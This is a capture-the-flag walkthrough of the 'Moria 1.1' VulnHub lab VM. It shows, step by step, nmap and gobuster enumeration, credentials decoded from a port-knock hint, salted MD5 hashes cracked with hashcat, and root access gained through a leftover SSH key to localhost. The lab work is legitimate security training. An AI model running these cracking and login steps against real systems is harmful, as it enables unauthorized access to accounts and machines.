CTF Walkthrough: Moria 1.1

Before I get started, I would like to clarify that this challenge is less hacking (no exploits or anything of that nature needed), and more capture the flag, where each step will give you a clue to get to the next step. This one drove me nuts in a couple spots, and because I wasn’t in the right mindset going in, I did ask a friend who had completed it for a hint. Twice. Each time he was able to say something that got me back on track, I was pretty much overthinking it each time.

Anyway, off we go, let’s get started with Moria 1.1, available at VulnHub. The goal of this challenge is to get root and read the flag.

Also, to be completely transparent, I spent a lot of time going down dead ends on this one, and I’m only (mostly) writing up the proper ways to get through this challenge to keep it simple and straightforward.

As always, we start with port discovery.

root@kali:~# nmap -A -T4 -sS 10.13.37.207

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-11 21:52 EST
Nmap scan report for 10.13.37.207
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey: 
|   2048 47:b5:ed:e3:f9:ad:96:88:c0:f2:83:23:7f:a3:d3:4f (RSA)
|   256 85:cd:a2:d8:bb:85:f6:0f:4e:ae:8c:aa:73:52:ec:63 (ECDSA)
|_  256 b1:77:7e:08:b3:a0:84:f8:f4:5d:f9:8e:d5:85:b9:34 (EdDSA)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Gates of Moria
MAC Address: 08:00:27:E5:47:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 10.13.37.207

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.88 seconds

Let’s poke at FTP first (I didn’t do this in exactly this order myself, but it makes more sense this way).

root@kali:~# ftp 10.13.37.207
Connected to 10.13.37.207.
220 Welcome Balrog!
Name (10.13.37.207:root): 

Welcome Balrog? Is that my name now? Sure, I’ll be Balrog. Unfortunately no password that I tried worked (of course), but we’ll just keep this in mind for later.

Opening port 80 in a browser shows us just an image. Being a LOTR fan, I immediately recognize it as a drawing of the magical door to get into the Dwarf caves. Gandolf had to say “friend” in Elvish to enter, which is “Mellon”, which is basically what the text says. (Yes, I tried, and no, “Mellon” is not a pasword, not exactly anyway, but we’ll get there.) The source for the page reveals nothing of interest.

So lets run gobuster on it.

root@kali:~# gobuster -u http://10.13.37.207 -w /usr/share/wordlists/dirb/big.txt 

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.13.37.207/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 204,301,302,307,200
=====================================================
/w (Status: 301)
=====================================================

And then open http://10.13.37.207/w in the browser. And then http://10.13.37.2-7/w/h, and then http://10.13.37.207/w/h/i, etc, etc, etc, until we end up here:

It looks like refreshing this page will pick one of these messages at random.

Balin: "Be quiet, the Balrog will hear you!" 
Telchar to Thrain:"That human is slow, don't give up yet" 
"Eru! Save us!" 
Ori:"Will anyone hear us?" 
Maeglin:"The Balrog is not around, hurry!" 
"We will die here.." 
Nain:"Will the human get the message?" 
Fundin:"That human will never save us!" 
"Knock knock" 
Oin:"Stop knocking!" 
"Is this the end?" 
"Too loud!" 

Hmmmm, “Knock knock”? Message? Too loud? Balrog will hear you? (Remember, FTP called us Balrog. So they’re doing something that they’re afraid I will hear? Maybe I need to listen to something. But what can I do to listen to something the server is doing?

I thought maybe there should be some port knocking to open up a service/port on the server, so I ran the following to knock on those eight ports in order.

for x in 77 101 108 108 111 110 54 57; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.13.37.207; done

Another nmap scan showed nothing new, but eventually I realized that those numbers fall in the ASCII range, whereas port knocking could go up to port 65535. So I converted those numbers to ASCII characters and ended up with “Mellon69”. (“Mellon” is Elvish for “friend”, which is mentioned in the image of the gate from the index page on port 80.)

So now we have a potential user name (Ballrog), and maybe a password (Mellon69). So let’s try to use SSH.

root@kali:~# ssh Balrog@10.13.37.207
Balrog@10.13.37.207's password: Mellon69
Last login: Sat Nov 11 11:09:26 2017

WRONG GATE!

Connection to 10.13.37.207 closed.

Okay, that seems like a clue, and that seems like a valid account at least. I checked the browser (the picture of the gate), no change, so let’s try this same account information with FTP.

root@kali:~# ftp 10.13.37.207
Connected to 10.13.37.207.
220 Welcome Balrog!
Name (10.13.37.207:root): Balrog
331 Please specify the password.
Password: Mellon69
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Nice, we’re in. I poked around for an embarrassingly long time before getting the bright idea to look in the web root to see if there was anything gobuster didn’t pick up.

ftp> cd /var/www/html/
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0              23 Mar 12  2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r--------    1 48       48             85 Mar 12  2017 index.php
-r--------    1 48       48         161595 Mar 11  2017 moria.jpg
drwxr-xr-x    3 0        0              15 Mar 12  2017 w
226 Directory send OK.

Yyyyyup. Let’s go there (and view the source).

<style type="text/css">
.tg  {border-collapse:collapse;border-spacing:0;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg .tg-yw4l{vertical-align:top}
</style>
<table class="tg">
  <tr>
    <th class="tg-yw4l"><b>Prisoner's name</b><br></th>
    <th class="tg-yw4l"><b>Passkey</b></th>
  </tr>
  <tr>
    <td class="tg-yw4l">Balin<br></td>
    <td class="tg-yw4l">c2d8960157fc8540f6d5d66594e165e0</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Oin</td>
    <td class="tg-yw4l">727a279d913fba677c490102b135e51e</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Ori</td>
    <td class="tg-yw4l">8c3c3152a5c64ffb683d78efc3520114</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Maeglin</td>
    <td class="tg-yw4l">6ba94d6322f53f30aca4f34960203703</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Fundin</td>
    <td class="tg-yw4l">c789ec9fae1cd07adfc02930a39486a1</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Nain</td>
    <td class="tg-yw4l">fec21f5c7dcf8e5e54537cfda92df5fe</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Dain</td>
    <td class="tg-yw4l">6a113db1fd25c5501ec3a5936d817c29</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Thrain</td>
    <td class="tg-yw4l">7db5040c351237e8332bfbba757a1019</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Telchar</td>
    <td class="tg-yw4l">dd272382909a4f51163c77da6356cc6f</td>
  </tr>
</table>

<!--

6MAp84
bQkChe
HnqeN4
e5ad5s
g9Wxv7
HCCsxP
cC5nTr
h8spZR
tb9AWe

MD5(MD5(Password).Salt)

-->

Okay, a list of usernames and hashed passwords. Also a very useful bit of information in the comment. Basically the author took the password, MD5 encoded it, appended a random six character string (the salt), and the ran it through MD5 again. I did quite a bit of Google searching to find the easiest way to decrypt this (did you know Google results span multiple pages? I think I went to “Page 2” for this), before I found that hashcat has a mode built in that will handle this. So let’s set up a text file with the hashes and salts that hashcat can understand.

dd272382909a4f51163c77da6356cc6f:tb9AWe
727a279d913fba677c490102b135e51e:bQkChe
6ba94d6322f53f30aca4f34960203703:e5ad5s
8c3c3152a5c64ffb683d78efc3520114:HnqeN4
6a113db1fd25c5501ec3a5936d817c29:cC5nTr
c2d8960157fc8540f6d5d66594e165e0:6MAp84
7db5040c351237e8332bfbba757a1019:h8spZR
fec21f5c7dcf8e5e54537cfda92df5fe:HCCsxP
c789ec9fae1cd07adfc02930a39486a1:g9Wxv7

The mode we’ll want to use is 2611.

root@kali:~/CTF/Moria# hashcat -m 2611 --force --show accounts.txt /usr/share/wordlists/rockyou.txt
dd272382909a4f51163c77da6356cc6f:tb9AWe:magic
727a279d913fba677c490102b135e51e:bQkChe:rainbow
6ba94d6322f53f30aca4f34960203703:e5ad5s:fuckoff
8c3c3152a5c64ffb683d78efc3520114:HnqeN4:spanky
6a113db1fd25c5501ec3a5936d817c29:cC5nTr:abcdef
c2d8960157fc8540f6d5d66594e165e0:6MAp84:flower
7db5040c351237e8332bfbba757a1019:h8spZR:darkness
fec21f5c7dcf8e5e54537cfda92df5fe:HCCsxP:warrior
c789ec9fae1cd07adfc02930a39486a1:g9Wxv7:hunter2

And matching up the results with the account names yields the following:

Balin:flower
Oin:rainbow
Ori:spanky
Maeglin:fuckoff
Fundin:hunter2
Nain:warrior
Dain:abcdef
Thrain:darkness
Telchar:magic

Let’s go ahead and give these accounts a shot. (Skipping all the ones that didn’t work, because that’s boring.)

root@kali:~/CTF/Moria# ssh Ori@10.13.37.207
Ori@10.13.37.207's password: spanky
Last login: Sat Nov 11 17:12:27 2017 from ::1
-bash-4.2$ id
uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)

Nice, we’re in! Hopefully we’re almost done, this one is taking me a while to get through!

Okay, I spent a long time here. I tried running a ton of privilege escalation cracks, shortcuts, hacks, anything I could think of, but nothing worked. Eventually I asked my friend for a clue, and he pointed me in the right direction, telling me to look in ~/.ssh/known_hosts. I of course already took a look at this file, but I failed to notice the irregularity in the file.

Basically, if you see 127.0.0.1 in that file, (or localhost), then that user has logged in to the machine locally using SSH. The only reasons to do that are to test the SSH server, or maybe to log in as root if the current user can’t sudo?

-bash-4.2$ cat ~/.ssh/known_hosts
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
-bash-4.2$ ssh root@127.0.0.1 -i ~/.ssh/id_rsa
Last login: Sat Nov 11 17:15:09 2017 from 127.0.0.1
[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@Moria ~]# cat /root/flag.txt 
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.” 

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?
-Abatchy

Bedtime.